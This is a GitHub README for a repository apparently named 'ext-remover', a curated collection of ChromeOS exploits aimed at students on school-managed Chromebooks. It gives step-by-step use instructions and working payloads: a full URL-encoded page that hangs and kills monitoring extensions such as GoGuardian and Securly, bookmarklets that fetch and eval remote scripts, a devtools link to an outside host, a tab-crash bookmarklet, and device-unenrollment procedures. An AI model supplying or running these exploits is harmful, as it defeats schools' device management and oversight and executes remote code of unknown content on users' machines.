Skip to content

schoolexploitkid/ext-remover

ย 
ย 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

EXT-REMOVER

This is a curated list of exploits for ChromeOS. It started with LTBEEF, and now there are more! Some of these exploits can destroy your computer if misused. So PLEASE, PLEASE make sure you follow these instructions very carefully!

Need help? Ask for help here!

Please use these only when you have permission, I (3kh0) do not condone the use of any exploits for illegal purposes!

Image Credit: LittleMissNyan

Thank you to all of the contributors! You all are pretty epic :D

Table of contents generated with readme-toc

Securly-Kill

You must be able to install ublock origin to do this. Steps:

  1. Install Ublock Origin extension
  2. Set up URun
  3. Go to https://securly.com and click Ctrl + Shift + ` (It will say blocked but its fine) ## DO NOT CLOSE THE OPENED WINDOW!!!
  4. Remove URun and set up UBlock run
  5. Copy the code from here: https://raw.githubusercontent.com/zek-c/Securly-Kill-V111/refs/heads/main/kill.js
  6. Go back to https://securly.com and click Ctrl + Shift + ` again. The prompt will open in the blocked urun window, but that is how it should work
  7. Paste the code you copied into the eval prompt and click enter
  8. A big red OFF button should show up. Click off to kill the extension.

BR1CK

BR1CK is an exploit that allows users to unenroll/deprovise managed chromebooks. It currently works on all versions for CR50s (ti50 isn't and will not be supported) for instructions visit: BR1CK's website or visit the repository to download the website's .ZIP here

๐Ÿ”ผ Back to top

OlyBmmer

OlyBmmer is an exploit that allows users to unenroll school-managed Chromebooks. Due to the specificness of this exploit, please visit the linked repository: OlyBmmer Exploit

๐Ÿ”ผ Back to top

Rigtools

Rigtools is an exploit that allows users to run code on extensions, disable extensions, and basically do whatever they want with an extension as long as it has the correct permissions. As of October 2024, it is patched in Chrome OS 129 and above.

How do you use it?

  1. Open this link and just leave it alone. (Note: This will not run code it's just there to fix the second page.)
devtools://devtools/bundled/devtools_app.html
  1. Open this link and go to Network
devtools://devtools/bundled/devtools_app.html?experiments=true&ws=rig.kxtz.dev/
  1. Double-Click the black/grey box: image image

  2. Click extension-ID and find your extension-ID.

  3. Paste in the extension ID and it should load a filesystem: page. You may have other extensions under it, you can disable those too.

Lastly, You can run code like

alert("hi")

so if you have the correct permissions on your extensions manifest file, you can run this code below to run a certain piece of code on any page: - tabs - activeTab - browserAction - 'unsafe-eval' set in the CSP (content-security-policy) If it does not have these permissions, this will not work. (These are in the manifest file.)

chrome.browserAction.onClicked.addListener(() => {chrome.tabs.executeScript(null, {code: `location.href="javascript:replace this part with your own bookmarklet.";`});});

and if it works, nice! If it doesn't, then cry in a corner.

Link to repo to self host for new/unofficial ui: https://github.com/Sincereham222/rigtools-newui Link to repo for official ui: https://github.com/FWSmasher/rigtools

๐Ÿ”ผ Back to top

ExtHang3r

ExtHang3r is an exploit that allows users to toggle admin-installed extensions on and off. As of October 2024, it remains unpatched in Chrome OS 127.

How do I use it?

  1. Copy and open this link and follow the directions:
data:text/html;charset=utf-8,%3C!DOCTYPE%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%3Chead%3E%0A%20%20%3Cmeta%20charset%3D%22UTF-8%22%3E%0A%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1.0%22%3E%0A%20%20%3Ctitle%3EExtHang3r%3C%2Ftitle%3E%0A%20%20%3Clink%20rel%3D%22shortcut%20icon%22%20type%3D%22image%2Fpng%22%20href%3D%22https%3A%2F%2Fraw.githubusercontent.com%2FBlobby-Boi%2FExtHang3r%2Fmain%2Ffavicon.png%22%3E%0A%20%20%3Clink%20rel%3D%22stylesheet%22%20href%3D%22https%3A%2F%2Ffonts.googleapis.com%2Fcss2%3Ffamily%3DVarela%2BRound%26display%3Dswap%22%3E%0A%20%20%3Cstyle%3E%0A%20%20%20%20body%20%7B%0A%20%20%20%20%20%20font-family%3A%20'Varela%20Round'%2C%20sans-serif%3B%0A%20%20%20%20%20%20margin%3A%200%3B%0A%20%20%20%20%20%20padding%3A%200%3B%0A%20%20%20%20%20%20background-color%3A%20%23f8f9fa%3B%0A%20%20%20%20%20%20color%3A%20%23333%3B%0A%20%20%20%20%7D%0A%20%20%20%20header%20%7B%0A%20%20%20%20%20%20background-color%3A%20%23343a40%3B%0A%20%20%20%20%20%20color%3A%20%23fff%3B%0A%20%20%20%20%20%20padding%3A%2010px%2020px%3B%0A%20%20%20%20%20%20text-align%3A%20center%3B%0A%20%20%20%20%20%20display%3A%20flex%3B%0A%20%20%20%20%20%20align-items%3A%20center%3B%0A%20%20%20%20%20%20justify-content%3A%20center%3B%0A%20%20%20%20%20%20box-shadow%3A%200%202px%205px%20rgba(0%2C%200%2C%200%2C%200.1)%3B%0A%20%20%20%20%7D%0A%20%20%20%20.logo%20%7B%0A%20%20%20%20%20%20width%3A%2050px%3B%0A%20%20%20%20%20%20height%3A%2050px%3B%0A%20%20%20%20%20%20margin-right%3A%2010px%3B%0A%20%20%20%20%7D%0A%20%20%20%20.container%20%7B%0A%20%20%20%20%20%20max-width%3A%20800px%3B%0A%20%20%20%20%20%20margin%3A%20150px%20auto%200%20auto%3B%0A%20%20%20%20%20%20padding%3A%2020px%3B%0A%20%20%20%20%20%20text-align%3A%20center%3B%0A%20%20%20%20%20%20background%3A%20%23fff%3B%0A%20%20%20%20%20%20box-shadow%3A%200%204px%208px%20rgba(0%2C%200%2C%200%2C%200.1)%3B%0A%20%20%20%20%20%20border-radius%3A%208px%3B%0A%20%20%20%20%7D%0A%20%20%20%20select%20%7B%0A%20%20%20%20%20%20font-family%3A%20'Varela%20Round'%2C%20sans-serif%3B%0A%20%20%20%20%20%20margin-bottom%3A%2010px%3B%0A%20%20%20%20%20%20padding%3A%2010px%3B%0A%20%20%20%20%20%20font-size%3A%2016px%3B%0A%20%20%20%20%20%20border%3A%201px%20solid%20%23ced4da%3B%0A%20%20%20%20%20%20border-radius%3A%204px%3B%0A%20%20%20%20%20%20width%3A%20100%25%3B%0A%20%20%20%20%7D%0A%20%20%20%20button%20%7B%0A%20%20%20%20%20%20font-family%3A%20'Varela%20Round'%2C%20sans-serif%3B%0A%20%20%20%20%20%20background-color%3A%20%23007bff%3B%0A%20%20%20%20%20%20color%3A%20%23fff%3B%0A%20%20%20%20%20%20border%3A%20none%3B%0A%20%20%20%20%20%20padding%3A%2010px%2020px%3B%0A%20%20%20%20%20%20font-size%3A%2016px%3B%0A%20%20%20%20%20%20cursor%3A%20pointer%3B%0A%20%20%20%20%20%20border-radius%3A%205px%3B%0A%20%20%20%20%20%20margin-top%3A%2010px%3B%0A%20%20%20%20%20%20transition%3A%20background-color%200.3s%20ease%3B%0A%20%20%20%20%7D%0A%20%20%20%20button%3Ahover%20%7B%0A%20%20%20%20%20%20background-color%3A%20%230056b3%3B%0A%20%20%20%20%7D%0A%20%20%20%20.overlay%20%7B%0A%20%20%20%20%20%20position%3A%20fixed%3B%0A%20%20%20%20%20%20top%3A%200%3B%0A%20%20%20%20%20%20left%3A%200%3B%0A%20%20%20%20%20%20width%3A%20100%25%3B%0A%20%20%20%20%20%20height%3A%20100%25%3B%0A%20%20%20%20%20%20background-color%3A%20rgba(0%2C%200%2C%200%2C%200.7)%3B%0A%20%20%20%20%20%20display%3A%20none%3B%0A%20%20%20%20%20%20justify-content%3A%20center%3B%0A%20%20%20%20%20%20align-items%3A%20center%3B%0A%20%20%20%20%20%20z-index%3A%209999%3B%0A%20%20%20%20%20%20color%3A%20%23fff%3B%0A%20%20%20%20%20%20font-size%3A%2024px%3B%0A%20%20%20%20%20%20user-select%3A%20none%3B%0A%20%20%20%20%20%20flex-direction%3A%20column%3B%0A%20%20%20%20%7D%0A%20%20%20%20.spinner%20%7B%0A%20%20%20%20%20%20border%3A%206px%20solid%20rgba(255%2C%20255%2C%20255%2C%200.3)%3B%0A%20%20%20%20%20%20border-top%3A%206px%20solid%20%23fff%3B%0A%20%20%20%20%20%20border-radius%3A%2050%25%3B%0A%20%20%20%20%20%20width%3A%2040px%3B%0A%20%20%20%20%20%20height%3A%2040px%3B%0A%20%20%20%20%20%20animation%3A%20spin%201s%20linear%20infinite%3B%0A%20%20%20%20%20%20margin-bottom%3A%2020px%3B%0A%20%20%20%20%7D%0A%20%20%20%20%40keyframes%20spin%20%7B%0A%20%20%20%20%20%200%25%20%7B%20transform%3A%20rotate(0deg)%3B%20%7D%0A%20%20%20%20%20%20100%25%20%7B%20transform%3A%20rotate(360deg)%3B%20%7D%0A%20%20%20%20%7D%0A%20%20%20%20%23killExtensionText%20%7B%0A%20%20%20%20%20%20display%3A%20none%3B%0A%20%20%20%20%20%20margin-top%3A%2020px%3B%0A%20%20%20%20%20%20color%3A%20%23333%3B%0A%20%20%20%20%20%20font-size%3A%2018px%3B%0A%20%20%20%20%20%20text-align%3A%20center%3B%0A%20%20%20%20%20%20background%3A%20%23e9ecef%3B%0A%20%20%20%20%20%20padding%3A%2020px%3B%0A%20%20%20%20%20%20border-radius%3A%208px%3B%0A%20%20%20%20%20%20box-shadow%3A%200%204px%208px%20rgba(0%2C%200%2C%200%2C%200.1)%3B%0A%20%20%20%20%7D%0A%20%20%20%09%20%23killButton%20%7B%0A%09%20%20display%3A%20none%3B%0A%09%20%20background-color%3A%20%23dc3545%3B%0A%09%20%20color%3A%20%23fff%3B%0A%09%20%20border%3A%20none%3B%0A%09%20%20padding%3A%2010px%2020px%3B%0A%09%20%20font-size%3A%2016px%3B%0A%09%20%20cursor%3A%20pointer%3B%0A%09%20%20border-radius%3A%205px%3B%0A%20%09%20%20transition%3A%20background-color%200.3s%20ease%3B%0A%09%7D%0A%0A%09%23killButton%3Ahover%20%7B%0A%09%20%20background-color%3A%20%239c1c28%3B%0A%09%7D%0A%20%20%20%20footer%20%7B%0A%20%20%20%20%20%20background-color%3A%20%23343a40%3B%0A%20%20%20%20%20%20color%3A%20%23fff%3B%0A%20%20%20%20%20%20text-align%3A%20center%3B%0A%20%20%20%20%20%20padding%3A%2010px%3B%0A%20%20%20%20%20%20position%3A%20fixed%3B%0A%20%20%20%20%20%20bottom%3A%200%3B%0A%20%20%20%20%20%20width%3A%20100%25%3B%0A%20%20%20%20%7D%0A%20%20%20%20footer%20a%20%7B%0A%20%20%20%20%20%20color%3A%20%23007bff%3B%0A%20%20%20%20%20%20text-decoration%3A%20none%3B%0A%20%20%20%20%7D%0A%20%20%20%20footer%20a%3Ahover%20%7B%0A%20%20%20%20%20%20text-decoration%3A%20underline%3B%0A%20%20%20%20%7D%0A%20%20%3C%2Fstyle%3E%0A%3C%2Fhead%3E%0A%3Cbody%3E%0A%0A%3Cheader%3E%0A%20%20%3Cimg%20src%3D%22https%3A%2F%2Fblobby-boi.github.io%2FBlobbypassXSS%2Ffavicon.png%22%20alt%3D%22Logo%22%20class%3D%22logo%22%3E%0A%20%20%3Ch1%3EExtHang3r%3C%2Fh1%3E%0A%3C%2Fheader%3E%0A%0A%3Cdiv%20class%3D%22container%22%3E%0A%20%20%3Cp%3EExtHang3r%20is%20an%20exploit%20that%20allows%20ChromeOS%20users%20to%20kill%20managed%20extensions%20after%20the%20LTMEAT%20patch.%20It%20remains%20unpatched%20in%20all%20new%20ChromeOS%20versions%20as%20of%20September%202024.%3C%2Fp%3E%0A%20%20%3Clabel%20for%3D%22iframeSelect%22%20id%3D%22labelForIframeSelect%22%3ESelect%20extension%3A%3C%2Flabel%3E%0A%20%20%3Cselect%20id%3D%22iframeSelect%22%3E%0A%20%20%3C%2Fselect%3E%0A%20%20%3Cbutton%20onclick%3D%22warning()%3B%22%20id%3D%22hangButton%22%3EHang%20Extension!%3C%2Fbutton%3E%0A%20%20%3Cbutton%20id%3D%22killButton%22%20onclick%3D%22openExtensionPopup()%3B%22%3EKill%20Extension!%3C%2Fbutton%3E%0A%3C%2Fdiv%3E%0A%0A%3Cdiv%20class%3D%22overlay%22%20id%3D%22overlay%22%3E%0A%20%20%3Cdiv%20class%3D%22spinner%22%3E%3C%2Fdiv%3E%0A%20%20Hanging...%20(This%20will%20take%20about%201%20minute)%0A%3C%2Fdiv%3E%0A%3Cdiv%20id%3D%22killExtensionText%22%3E%3C%2Fdiv%3E%0A%0A%3Cfooter%3E%0A%20%20%3Cp%3EMade%20by%20%3Ca%20href%3D%22https%3A%2F%2Fgithub.com%2FBlobby-Boi%2F%22%3EBlobby%20Boi%3C%2Fa%3E%3C%2Fp%3E%0A%3C%2Ffooter%3E%0A%0A%3Cscript%3E%0A%20%20async%20function%20checkExtensionURL(url)%20%7B%0A%20%20%20%20try%20%7B%0A%20%20%20%20%20%20const%20response%20%3D%20await%20fetch(url)%3B%0A%20%20%20%20%20%20if%20(response.ok)%20%7B%0A%20%20%20%20%20%20%20%20return%20true%3B%0A%20%20%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20return%20false%3B%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%20catch%20(error)%20%7B%0A%20%20%20%20%20%20return%20false%3B%0A%20%20%20%20%7D%0A%20%20%7D%0A%0A%20%20async%20function%20populateSelectOptions()%20%7B%0A%20%20%20%20const%20selectElement%20%3D%20document.getElementById(%22iframeSelect%22)%3B%0A%20%20%20%20const%20extensions%20%3D%20%7B%0A%20%20%20%20%20%20%22Securly%22%3A%20%22chrome-extension%3A%2F%2Fjoflmkccibkooplaeoinecjbmdebglab%2Ffonts%2FMetropolis.css%22%2C%0A%20%20%20%20%20%20%22Securly%20(old)%22%3A%20%22chrome-extension%3A%2F%2Fiheobagjkfklnlikgihanlhcddjoihkg%2Ffonts%2FMetropolis.css%22%2C%0A%20%20%20%20%20%20%22GoGuardian%22%3A%20%22chrome-extension%3A%2F%2Fhaldlgldplgnggkjaafhelgiaglafanh%2Fyoutube_injection.js%22%2C%0A%20%20%20%20%20%20%22LANSchool%22%3A%20%22chrome-extension%3A%2F%2Fbaleiojnjpgeojohhhfbichcodgljmnj%2Fblocked.html%22%2C%0A%20%20%20%20%20%20%22Linewize%22%3A%20%22chrome-extension%3A%2F%2Fddfbkhpmcdbciejenfcolaaiebnjcbfc%2Fbackground%2Fassets%2Fpages%2Fdefault-blocked.html%22%2C%0A%20%20%20%20%20%20%22Blocksi%22%3A%20%22chrome-extension%3A%2F%2Fghlpmldmjjhmdgmneoaibbegkjjbonbk%2Fpages%2FblockPage.html%22%2C%0A%20%20%20%20%20%20%22FortiGuard%22%3A%20%22chrome-extension%3A%2F%2Figbgpehnbmhgdgjbhkkpedommgmfbeao%2Fyoutube_injection.js%22%2C%0A%20%20%20%20%20%20%22Cisco%20Umbrella%22%3A%20%22chrome-extension%3A%2F%2Fjcdhmojfecjfmbdpchihbeilohgnbdci%2Fblocked.html%22%2C%0A%20%20%20%20%20%20%22ContentKeeper%22%3A%20%22chrome-extension%3A%2F%2Fjdogphakondfdmcanpapfahkdomaicfa%2Fimg%2Fckauth19x.png%22%2C%0A%20%20%20%20%20%20%22CK-Authenticator%20G3%22%3A%20%22chrome-extension%3A%2F%2Fodoanpnonilogofggaohhkdkdgbhdljp%2Fimg%2Fckauth19x.png%22%2C%0A%20%20%20%20%20%20%22Securly%20Classroom%22%3A%20%22chrome-extension%3A%2F%2Fjfbecfmiegcjddenjhlbhlikcbfmnafd%2Fnotfound.html%22%2C%0A%20%20%20%20%20%20%22Hapara%22%3A%20%22chrome-extension%3A%2F%2Fkbohafcopfpigkjdimdcdgenlhkmhbnc%2Fblocked.html%22%2C%0A%20%20%20%20%20%20%22Hapara%20(new%20ID)%22%3A%20%22chrome-extension%3A%2F%2Faceopacgaepdcelohobicpffbbejnfac%2Fblocked.html%22%2C%0A%20%20%20%20%20%20%22iboss%22%3A%20%22chrome-extension%3A%2F%2Fkmffehbidlalibfeklaefnckpidbodff%2Frestricted.html%22%2C%0A%20%20%20%20%20%20%22Lightspeed%20Filter%20Agent%22%3A%20%22chrome-extension%3A%2F%2Fadkcpkpghahmbopkjchobieckeoaoeem%2Ficon-128.png%22%2C%0A%20%20%20%20%20%20%22Lightspeed%20Classroom%22%3A%20%22chrome-extension%3A%2F%2Fkkbmdgjggcdajckdlbngdjonpchpaiea%2Fassets%2Ficon-classroom-128.png%22%2C%0A%20%20%20%20%20%20%22InterCLASS%20Filtering%20Service%22%3A%20%22chrome-extension%3A%2F%2Fjbddgjglgkkneonnineaohdhabjbgopi%2Fpages%2Fmessage-page.html%22%2C%0A%20%20%20%20%20%20%22InterSafe%20GatewayConnection%20Agent%22%3A%20%22chrome-extension%3A%2F%2Fecjoghccnjlodjlmkgmnbnkdcbnjgden%2Fresources%2Foptions.js%22%2C%0A%20%20%20%20%20%20%22LoiLo%20Web%20Filters%22%3A%20%22chrome-extension%3A%2F%2Fpabjlbjcgldndnpjnokjakbdofjgnfia%2Fimage%2Fallow_icon%2Fshield_green_128x128.png%22%2C%0A%20%20%20%20%20%20%22Gopher%20Buddy%22%3A%20%22chrome-extension%3A%2F%2Fcgbbbjmgdpnifijconhamggjehlamcif%2Fimages%2Fgopher-buddy_128x128_color.png%22%2C%0A%20%20%20%20%20%20%22LanSchool%20Web%20Helper%22%3A%20%22chrome-extension%3A%2F%2Fhonjcnefekfnompampcpmcdadibmjhlk%2Fblocked.html%22%2C%0A%20%20%20%20%20%20%22IMTLazarus%22%3A%20%22chrome-extension%3A%2F%2Fcgigopjakkeclhggchgnhmpmhghcbnaf%2Fmodels%2Fmodel.json%22%2C%0A%20%20%20%20%20%20%22Impero%20Backdrop%22%3A%20%22chrome-extension%3A%2F%2Fjjpmjccpemllnmgiaojaocgnakpmfgjg%2Flicenses.html%22%2C%0A%20%20%20%20%20%20%22Mobile%20Guardian%22%3A%20%22chrome-extension%3A%2F%2Ffgmafhdohjkdhfaacgbgclmfgkgokgmb%2Fblock.html%22%0A%20%20%20%20%7D%3B%0A%20%20%20%20%0A%20%20%20%20let%20hasSupportedExtensions%20%3D%20false%3B%0A%0A%20%20%20%20for%20(const%20%5Bname%2C%20url%5D%20of%20Object.entries(extensions))%20%7B%0A%20%20%20%20%20%20if%20(await%20checkExtensionURL(url))%20%7B%0A%20%20%20%20%20%20%20%20const%20option%20%3D%20document.createElement(%22option%22)%3B%0A%20%20%20%20%20%20%20%20option.value%20%3D%20url%3B%0A%20%20%20%20%20%20%20%20option.textContent%20%3D%20name%3B%0A%20%20%20%20%20%20%20%20selectElement.appendChild(option)%3B%0A%20%20%20%20%20%20%20%20hasSupportedExtensions%20%3D%20true%3B%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%20%20%0A%20%20%20%20if%20(!hasSupportedExtensions)%20%7B%0A%20%20%20%20%20%20const%20option%20%3D%20document.createElement(%22option%22)%3B%0A%20%20%20%20%20%20option.value%20%3D%20%22%22%3B%0A%20%20%20%20%20%20option.textContent%20%3D%20%22No%20supported%20extensions%20installed%22%3B%0A%20%20%20%20%20%20selectElement.appendChild(option)%3B%0A%20%20%20%20%20%20document.getElementById(%22hangButton%22).style.display%20%3D%20%22none%22%3B%0A%20%20%20%20%7D%0A%20%20%7D%0A%0A%20%20populateSelectOptions()%3B%0A%20%20%0A%20%20function%20replaceIframes(container%2C%20iframeSrc)%20%7B%0A%20%20%20%20for%20(var%20i%20%3D%200%3B%20i%20%3C%201000%3B%20i%2B%2B)%20%7B%0A%20%20%20%20%20%20var%20iframe%20%3D%20document.createElement('iframe')%3B%0A%20%20%20%20%20%20iframe.src%20%3D%20iframeSrc%3B%0A%20%20%20%20%20%20iframe.style.width%20%3D%20'100%25'%3B%0A%20%20%20%20%20%20iframe.style.height%20%3D%20'100px'%3B%0A%20%20%20%20%20%20container.appendChild(iframe)%3B%0A%20%20%20%20%7D%0A%20%20%20%20setTimeout(function()%20%7B%0A%20%20%20%20%20%20while%20(container.firstChild)%20%7B%0A%20%20%20%20%20%20%20%20container.removeChild(container.firstChild)%3B%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20replaceIframes(container%2C%20iframeSrc)%3B%0A%20%20%20%20%7D%2C%205)%3B%0A%20%20%7D%0A%0A%20%20function%20warning()%20%7B%0A%20%20%20%20var%20overlay%20%3D%20document.getElementById(%22overlay%22)%3B%0A%20%20%20%20overlay.style.display%20%3D%20%22flex%22%3B%0A%20%20%20%20var%20iframeSelect%20%3D%20document.getElementById(%22iframeSelect%22)%3B%0A%20%20%20%20var%20selectedOption%20%3D%20iframeSelect.options%5BiframeSelect.selectedIndex%5D.text%3B%0A%20%20%20%20var%20selectedSrc%20%3D%20iframeSelect.value%3B%0A%20%20%20%20var%20popup%20%3D%20window.open(%22%22%2C%20%22PopupWindow%22%2C%20%22width%3D100%2Cheight%3D100%22)%3B%0A%20%20%20%20var%20popupDocument%20%3D%20popup.document%3B%0A%20%20%20%20var%20popupBody%20%3D%20popupDocument.body%3B%0A%20%20%20%20var%20iframeContainer%20%3D%20popupDocument.createElement('div')%3B%0A%20%20%20%20iframeContainer.id%20%3D%20'iframeContainer'%3B%0A%20%20%20%20popupBody.appendChild(iframeContainer)%3B%0A%20%20%20%20replaceIframes(iframeContainer%2C%20selectedSrc)%3B%0A%20%20%20%20setTimeout(function()%20%7B%0A%20%20%20%20%20%20popup.close()%3B%0A%20%20%20%20%20%20var%20extensionId%20%3D%20selectedSrc.substring(selectedSrc.indexOf(%22%2F%2F%22)%20%2B%202%2C%20selectedSrc.indexOf(%22%2F%22%2C%20selectedSrc.indexOf(%22%2F%2F%22)%20%2B%202))%3B%0A%20%20%20%20%20%20var%20extensionURL%20%3D%20%22chrome-extension%3A%2F%2F%22%20%2B%20extensionId%3B%0A%20%20%20%20%20%20var%20killExtensionText%20%3D%20document.getElementById(%22killExtensionText%22)%3B%0A%20%20%20%20%20%20killExtensionText.innerHTML%20%3D%20%22Now%20that%20the%20extension%20%3Cstrong%3E%22%20%2B%20selectedOption%20%2B%20%22%3C%2Fstrong%3E%20has%20been%20hanged%2C%20press%20the%20button%20above.%22%3B%0A%20%20%20%20%20%20setTimeout(function()%20%7B%0A%20%20%20%20%20%20%20%20overlay.style.display%20%3D%20%22none%22%3B%0A%20%20%20%20%20%20%20%20killExtensionText.style.display%20%3D%20%22block%22%3B%0A%20%20%20%20%20%20%20%20document.getElementById(%22killButton%22).style.display%20%3D%20%22inline-block%22%3B%0A%20%20%20%20%20%20%20%20document.getElementById(%22hangButton%22).style.display%20%3D%20%22none%22%3B%0A%09document.getElementById(%22iframeSelect%22).style.display%20%3D%20%22none%22%3B%0A%09document.getElementById(%22labelForIframeSelect%22).style.display%20%3D%20%22none%22%3B%0A%20%20%20%20%20%20%20%20document.getElementById(%22killButton%22).setAttribute(%22data-url%22%2C%20selectedSrc)%3B%0A%20%20%20%20%20%20%7D%2C%2010000)%3B%0A%20%20%20%20%7D%2C%205000)%3B%0A%20%20%7D%0A%0A%20%20function%20openExtensionPopup()%20%7B%0A%20%20%20%20var%20selectedSrc%20%3D%20document.getElementById(%22killButton%22).getAttribute(%22data-url%22)%3B%0A%20%20%20%20var%20extensionId%20%3D%20selectedSrc.substring(selectedSrc.indexOf(%22%2F%2F%22)%20%2B%202%2C%20selectedSrc.indexOf(%22%2F%22%2C%20selectedSrc.indexOf(%22%2F%2F%22)%20%2B%202))%3B%0A%20%20%20%20var%20killExtensionText%20%3D%20document.getElementById(%22killExtensionText%22)%3B%0A%20%20%20%20document.getElementById(%22killButton%22).style.display%20%3D%20%22none%22%3B%0A%20%20%20%20killExtensionText.innerHTML%20%3D%20%22Make%20sure%20to%20keep%20this%20tab%20open.%20Then%20in%20a%20new%20tab%20open%20%3Cstrong%3Echrome%3A%2F%2Fextensions%2F%3Fid%3D%22%20%2B%20extensionId%20%2B%20%22%3C%2Fstrong%3E%20Flip%20the%20switch%20called%20allow%20access%20to%20file%20URLs%20twice.%20The%20extension%20was%20successfully%20killed!%20Now%20you%20can%20close%20that%20tab%20as%20well%20as%20this%20one.%20If%20you%20want%20to%20restore%20the%20extension%2C%20flip%20the%20allow%20access%20to%20file%20URLs%20switch%20again.%22%3B%0A%20%20%20%20window.location.href%20%3D%20selectedSrc%3B%0A%20%20%7D%0A%3C%2Fscript%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E
  1. Enjoy! Keep the page open if it switches back on for some reason.

๐Ÿ”ผ Back to top

CryptoSmite Unenrollment

CryptoSmite is an exploit capable of completely unenrolling enterprise-managed Chromebooks. It was found by FWSmasher and released on March 9th, 2024.

This exploit has been patched since Chrome OS 120.

Finding Kernver

If you're on v120 or higher, you need to downgrade to use CryptoSmite. To do this, you first need to check your kernver= in Recovery Mode.

  1. Boot into Recovery Mode
    • Hold ESC + Refresh + Power for 2 or 3 seconds.
    • You should be on an "Insert Recovery Media" or "Let's step you through the recovery process" screen.
  2. Press TAB and look at the last digit of the kernver= line

If:

  • kernver= ends with a 2:
    Congratulations, you can downgrade to v119 or lower! Follow the instructions at Downgrading Change versions on how to downgrade.

  • kernver= ends with a 3 or higher:
    Sorry, you can't downgrade to v119 or lower. Wait for a new unenrollment exploit or do a dangerous hardware modification.

Using CryptoSmite

  1. Download a SH1MMER prebuilt image here: dl.darkn.bio
  2. Disable OS verification (blocked or not, doesn't matter), and boot into the shim.
  3. Navigate to Payloads and navigate to CryptoSmite using the arrow keys, then press Enter.
  4. Type in Y, then press enter, and it'll automatically reboot upon completion.
  5. Proceed through the setup partially till you get to the Add Account Screen.
    • If you see an update prompt, reboot it and then press CTRL + ALT + E on the Wi-Fi screen.
      • This should allow skipping the update or make it not appear at all.
  6. Powerwash the Chromebook at the "Add Account" screen. Afterwards, it'll be fully unenrolled.

Further Reading

๐Ÿ”ผ Back to top

SH1MMER Unenrollment

SH1MMER is an exploit capable of completely unenrolling enterprise-managed Chromebooks. The Mercury Workshop team found it and released it on Friday, January 13th, 2023.

Due to the detail this exploit requires, please check out the official website: sh1mmer.me

This exploit has been patched since Chrome OS 111.

Note

Mercury Workshop received a notice from Googleโ„ข๏ธ that they had to take down their builder and shims. Currently, multiple community members are rehosting it.

Further Reading

๐Ÿ”ผ Back to top

Hapara Focus Session Bypass

What is it?

An exploit that allows for access to sites outside of the Hapara Focus Session

How to use it?

Your teacher may be able to still see your screen, but they won't think you are doing anything wrong because of the focus session.

YOU MUST NEED data: LINKS ALLOWED, IF YOU DON'T HAVE THOSE ALLOWED, THIS WILL NOT WORK.

  1. create a bookmark named anything, head to the URL section, and paste this in it: data:text/html,<!DOCTYPE html> <html> <head> <title>full screen iframe</title> <style type="text/css"> html { overflow: auto; } html, body, div, iframe { margin: 0px; padding: 0px; height: 100%; border: none; } iframe { display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden; } </style> </head> <body> <iframe src="https://www.google.com?igu=1" frameborder="0" marginheight="0" marginwidth="0" width="100%" height="100%" scrolling="auto" id="google"> </iframe> </body> </html>
  2. when you are in a focus session, click the bookmark, and it will open a Google tab. (If it says that it doesn't work, then you can download the Iframe
  3. enjoy not having to listen to a lecture from your teacher! (Credit to Hero Link 6 For finding this exploit, you can find more info on his GitHub repository here.)

๐Ÿ”ผ Back to top

GuardianTabCrash Unrestricted browsing

What is it?

An exploit that allows for unrestricted internet access outside of GoGuardian's control

How to use it?

Teachers can still see your screen, but they can't block or close any of your tabs.

YOUR TEACHER NEEDS TO HAVE SET A TAB LIMIT. TRY OPENING TONS OF TABS TO CONVINCE THEM TO ENABLE TAB LIMITS.

  1. create a bookmark named anything: javascript: window.onbeforeunload = ()=>{return false;}
  2. Hold down CTRL and then SPAM CLICK the bookmark until you're well above the tab limit, opening a bunch of about:blank pages.
  3. It might ask if you want to leave this page. This is GoGuardian trying to close it. Say No, and click Prevent from creating additional dialogues.
  4. Enjoy your unblocked stay!

Discovered by @py660

๐Ÿ”ผ Back to top

Skiovox Unrestricted browsing

What is it?

An exploit that allows for browsing within a completely unblocked Chrome browser. It works on ChromeOS 118 and a wide range of previous versions.

  • Skiovox utilizes a bug in kiosk apps
  • Very similar to a bug from 3 years ago

Within the unblocked browser, you can

  • Install extensions
  • Bypass pretty much all blocks
  • Do whatever the honk you want

How to use it

Bypassi made a wonderful slideshow for you goofballs to follow and view using any of the links below!

Further Reading

๐Ÿ”ผ Back to top

LTBEEF Disable extensions

LTBEEF (Literally The Best Exploit Ever Found) is an exploit found by Bypassi (Bypassi#7037) in September 2022 and is a great way to disable spyware installed on your Chromebook by your school.

How to use LTBEEF

Use either of the two bookmarklets below. The instructions are the same for both.

  1. Copy the Javascript code from either of the two bookmarklets below
  2. Make a new bookmark on your Chromebook
  3. Put the Javascript code in the URL section of the bookmark
  4. Visit https://chrome.google.com/webstorex. (This is a 404 page, and that is ok.)
  5. If that page does not work, you can just change the end of the URL to anything else, like https://chrome.google.com/webstoreYAAAAAAAAAAAAAAAY
  6. Click on the bookmark you made
  7. Switch off the extensions you don't want to have anymore.
  8. You're done! The extension should now be disabled.

Please note that this exploit has been patched for quite some time

Bookmarklets

CompactCow GUI

compactcowgui

javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});

Ingot

ingot

javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())

๐Ÿ”ผ Back to top

LoMoH Disable extensions

Formerly named "Locked Mode Hack," this Chrome OS exploit uses the locked mode feature to soft disable force-enabled extensions on managed accounts (Excluding Hapara Highlights and Read&Write if installed).

This exploit is patched in Chrome OS 111

Bookmarklet Version (Original and nicer)

